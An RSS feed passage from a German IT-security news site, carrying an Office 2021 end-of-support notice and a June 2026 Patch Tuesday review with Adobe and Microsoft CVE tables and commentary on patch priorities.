<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=seite+windowsdna+verstndlich+registry%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 21:53:00 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 21:53:00 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=seite+windowsdna+verstndlich+registry%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=seite+windowsdna+verstndlich+registry%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Microsoft Office 2021 erreicht das Supportende am 13. Oktober 2026]]></title>
<description><![CDATA[Kleine Erinnerung für Benutzer von Microsoft Office 2021. Diese Office-Version von Microsoft erreicht ihr End of Life (EOL) zum 13. Oktober 2026 und bekommt danach weder Support noch Sicherheitsupdates. Microsoft Office 2021 wurde gemäß der Life-Cycle-Seite Microsofts zum 5. Oktober … Weiterlesen...]]></description>
<link>https://tsecurity.de/de/3694963/it-nachrichten/microsoft-office-2021-erreicht-das-supportende-am-13-oktober-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694963/it-nachrichten/microsoft-office-2021-erreicht-das-supportende-am-13-oktober-2026/</guid>
<pubDate>Sun, 26 Jul 2026 06:30:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kleine Erinnerung für Benutzer von Microsoft Office 2021. Diese Office-Version von Microsoft erreicht ihr End of Life (EOL) zum 13. Oktober 2026 und bekommt danach weder Support noch Sicherheitsupdates. Microsoft Office 2021 wurde gemäß der Life-Cycle-Seite Microsofts zum 5. Oktober … <a href="https://borncity.com/blog/2026/07/26/microsoft-office-2021-erreicht-das-supportende-am-13-oktober-2026/">Weiterlesen <span class="meta-nav">→</span></a>
<p><a href="https://borncity.com/blog/2026/07/26/microsoft-office-2021-erreicht-das-supportende-am-13-oktober-2026/" rel="nofollow">Quelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The June 2026 Security Update Review]]></title>
<description><![CDATA[I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a ...]]></description>
<link>https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694563/hacking/the-june-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I’ve made it through Pwn2Own Berlin, had a little vacation, and now I’m back for Patch Tuesday. Microsoft and Adobe didn’t disappoint. In fact, they have heralded my return with the largest Patch Tuesday release ever. Thanks? Take a break from your regularly scheduled activities and let’s take a look at the latest security patches from Adobe and Microsoft. If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for June 2026</strong></p><p class="">For June, Adobe released 11 bulletins addressing 123 unique CVEs in Adobe Acrobat Reader, ColdFusion, Experience Manager, Experience Manager Forms, InDesign, InCopy, Substance 3D Sampler, Content Credentials SDK, Dreamweaver, Format Plugins, and Adobe Campaign Classic. A total of 11 of these CVEs were reported through the ZDI program.</p><p class="">Here’s this month’s overview table:</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/campaign/apsb26-66.html" target="_blank">APSB26-66</a></td>
    <td>Adobe Campaign Classic</td>
    <td>2</td>
    <td>Critical</td>
    <td>10.0</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/coldfusion/apsb26-64.html" target="_blank">APSB26-64</a></td>
    <td>Adobe ColdFusion</td>
    <td>7</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>1</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/acrobat/apsb26-63.html" target="_blank">APSB26-63</a></td>
    <td>Adobe Acrobat Reader</td>
    <td>20</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/aem-forms/apsb26-57.html" target="_blank">APSB26-57</a></td>
    <td>Adobe Experience Manager Forms</td>
    <td>3</td>
    <td>Critical</td>
    <td>9.3</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/dreamweaver/apsb26-62.html" target="_blank">APSB26-62</a></td>
    <td>Adobe Dreamweaver</td>
    <td>5</td>
    <td>Critical</td>
    <td>8.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/formatplugins/apsb26-65.html" target="_blank">APSB26-65</a></td>
    <td>Adobe Format Plugins</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/incopy/apsb26-59.html" target="_blank">APSB26-59</a></td>
    <td>Adobe InCopy</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/indesign/apsb26-58.html" target="_blank">APSB26-58</a></td>
    <td>Adobe InDesign</td>
    <td>12</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-60.html" target="_blank">APSB26-60</a></td>
    <td>Adobe Substance 3D Sampler</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-61.html" target="_blank">APSB26-61</a></td>
    <td>Content Credentials SDK</td>
    <td>8</td>
    <td>Critical</td>
    <td>7.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/experience-manager/apsb26-56.html" target="_blank">APSB26-56</a></td>
    <td>Adobe Experience Manager</td>
    <td>57</td>
    <td>Important</td>
    <td>5.4</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>11 bulletins</td>
    <td>123</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  
  









  <p class="">Obviously, the update for Campaign Classic should be on the top of your deployment list if you’re a user. A CVSS 10 is rare; two in the same bulletin is pretty much a unicorn. Adobe says there are no active attacks, but I would expect heavy research into creating one. The update for Coldfusion is also a Priority 1, but again, no known attacks is the wild. I suspect the Reader patch will also receive a lot of attention as malicious PDFs are common in ransomware attacks. The update for Experience Manager may be large, but it’s mostly just cross-site scripting (XSS) bugs.</p><p class=""><strong>Microsoft Patches for June 2026</strong></p><p class="">This month, Microsoft released a new record 208 CVEs Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Github Copilot, Defender, Exchange Server, Hyper-V, Secure Boot, and BitLocker. At least, that’s my count. Microsoft’s tools seem to be having some issues, as they initially included a CVE from 2020 in this release. Regardless, the count is over 200, and I counted several times.</p><p class="">One of these bugs came through the ZDI program, but bugs submitted during Pwn2Own Berlin remain unpatched. If you include the Chromium and other third-party bugs, the total CVE count for June comes to a staggering 571 CVEs. 38 of these cases are rated Critical while the rest are rated Important in severity.</p><p class="">I’ve been counting CVEs on Patch Tuesday since 2017, and this is by far the largest monthly release in that time. The previous record was 177 set last year. It is extraordinary that Microsoft can produce so many patches in a single month, but it does raise concerns. How many of these cases were found using AI tools? How many patches were generated using AI to assist in coding or testing? What quality issues may exist in these patches? And likely most importantly, is this the new normal? The last two months were also large releases. Should sysadmins adjust their processes for prioritization and patch deployment based on this new volume of updates? Unfortunately, Microsoft is not providing those answers right now. Hopefully that changes in the future. BTW – just a note – the current number of CVEs shipped by Microsoft this year exceeds the total number of CVEs shipped in all of 2018.</p><p class="">One of the bugs patched by Microsoft this month is listed as under active exploitation and three others are listed as publicly known at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bug being exploited in the wild.</p><p class="">-   <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><strong>CVE-2026-41091</strong></a><strong> - Microsoft Defender Elevation of Privilege Vulnerability<br></strong>Since Microsoft doesn’t provide info on how widespread exploitation is, we must read some tea leaves. For this patch, several different people were acknowledged, which indicates multiple parties say this is in the wild, meaning exploitation is likely significant. The good news is that most people won’t need to take action as Defender updates itself. However, if you don’t have this configured or are in an isolated environment, you’ll need to update to the latest version.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><strong>CVE-2026-45657</strong></a><strong> - Windows Kernel Remote Code Execution Vulnerability<br></strong>This CVSS 9.8 bug allows remote, unauthenticated attackers to execute code at SYSTEM level without user interaction. Yup – this is wormable. The problem lies in the way the kernel handles TCP/IP. This was listed as “Exploitation Less Likely” by Microsoft, but rest assured that every researcher and bug shop on the planet is reversing this patch right now trying to create an exploit. Test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><strong>CVE-2026-47291</strong></a><strong> - HTTP.sys Remote Code Execution Vulnerability<br></strong>Our second CVSS 9.8 bug of the month, this also allows remote, unauthenticated attackers to execute code on affected systems without user interaction. However, there is a caveat. Systems using the default MaxRequestBytes registry value used by the Windows HTTP stack are not affected by this bug. You can edit your registry settings if you need protection while you test and deploy the patch. The bulletin includes instructions and even a PowerShell script for doing this action. Microsoft lists this as “Exploitation more likely”, so I would definitely check your registry settings.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><strong>CVE-2026-44815</strong></a><strong> - DHCP Client Service Remote Code Execution Vulnerability<br></strong>Here’s another CVSS 9.8 that has an odd incongruity. Although the CVSS says no permissions are required for exploitation, the write-up states it must be an “authenticated” user. I would err on the side of caution here and believe the CVSS. If that’s correct, then we have another bug where a remote, unauthenticated attacker could execute code on affected systems without user interaction. And since the DHCP client is on every OS, it’s a juicy target. This is another one to test and deploy with haste.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45585"><strong>CVE-2026-45585</strong></a><strong>/</strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><strong>CVE-2026-50507</strong></a><strong> - Windows BitLocker Security Feature Bypass Vulnerability<br></strong>If you’ve followed the ongoing saga of Nightmare Eclipse vs. MSRC, the bugs should look familiar. One is definitely a fix for “YellowKey”, while the other appears to be a fix for “GreenPlasma”. The researcher has promised a “<a href="https://www.theregister.com/security/2026/05/28/microsoft-0-day-feud-escalates-as-researcher-threatens-another-windows-exploit-dump/5248085">bone shattering</a>” drop on June 14, so let’s hope Microsoft is able to reach some understanding with the researcher before more 0-days are released. Also, there is a script provided by Microsoft as a mitigation, but the better strategy is to test and deploy the updates.</p><p class=""> Here’s the full list of CVEs released by Microsoft for June 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="new2026-Jun-cvrf2.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="1024">
 <col width="144">
 <col width="256">
 <col width="104" span="6">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">XI</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41091"><span>CVE-2026-41091</span></a></td>
  <td width="256" class="xl68">Microsoft Defender
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl71">Yes</td>
  <td class="xl70">0</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49160"><span>CVE-2026-49160</span></a></td>
  <td width="256" class="xl68">HTTP.sys Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50507"><span>CVE-2026-50507</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45586"><span>CVE-2026-45586</span></a></td>
  <td width="256" class="xl68">Windows Collaborative
  Translation Framework (CTFMON) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl71">Yes</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="91">
  <td class="xl67" height="91"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-10263"><span>CVE-2025-10263 *</span></a></td>
  <td width="256" class="xl68">ARM: CVE-2025-10263
  Completion of affected memory accesses might not be guaranteed by completion
  of a TLBI [kernel]</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48567"><span>CVE-2026-48567</span></a></td>
  <td width="256" class="xl68">Azure HorizonDB<span>  </span>Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">10</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32193"><span>CVE-2026-32193</span></a></td>
  <td width="256" class="xl68">Azure Kubernetes
  Service (AKS) Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47644"><span>CVE-2026-47644</span></a></td>
  <td width="256" class="xl68">Copilot Chat
  (Microsoft Edge) Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44815"><span>CVE-2026-44815</span></a></td>
  <td width="256" class="xl68">DHCP Client Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291"><span>CVE-2026-47291</span></a></td>
  <td width="256" class="xl68">HTTP.sys Remote Code
  Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42824"><span>CVE-2026-42824</span></a></td>
  <td width="256" class="xl68">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45476"><span>CVE-2026-45476</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Network Adapter Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44810"><span>CVE-2026-44810</span></a></td>
  <td width="256" class="xl68">Microsoft
  Cryptographic Services Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48579"><span>CVE-2026-48579</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Online Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47655"><span>CVE-2026-47655</span></a></td>
  <td width="256" class="xl68">Microsoft Graph
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45497"><span>CVE-2026-45497</span></a></td>
  <td width="256" class="xl68">Microsoft M365 Copilot
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">N/A</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45460"><span>CVE-2026-45460</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">4.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472"><span>CVE-2026-45472</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474"><span>CVE-2026-45474</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461"><span>CVE-2026-45461</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463"><span>CVE-2026-45463</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456"><span>CVE-2026-45456</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458"><span>CVE-2026-45458</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635"><span>CVE-2026-47635</span></a></td>
  <td width="256" class="xl68">Microsoft Outlook and
  Word Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26142"><span>CVE-2026-26142</span></a></td>
  <td width="256" class="xl68">Nuance PowerScribe
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47289"><span>CVE-2026-47289</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47654"><span>CVE-2026-47654</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48563"><span>CVE-2026-48563</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42992"><span>CVE-2026-42992</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44799"><span>CVE-2026-44799</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44801"><span>CVE-2026-44801</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42985"><span>CVE-2026-42985</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45648"><span>CVE-2026-45648</span></a></td>
  <td width="256" class="xl68">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42987"><span>CVE-2026-42987</span></a></td>
  <td width="256" class="xl68">Windows Deployment
  Services (WDS) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33828"><span>CVE-2026-33828</span></a></td>
  <td width="256" class="xl68">Windows Device Health
  Attestation (DHA) Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803"><span>CVE-2026-44803</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812"><span>CVE-2026-44812</span></a></td>
  <td width="256" class="xl68">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45607"><span>CVE-2026-45607</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
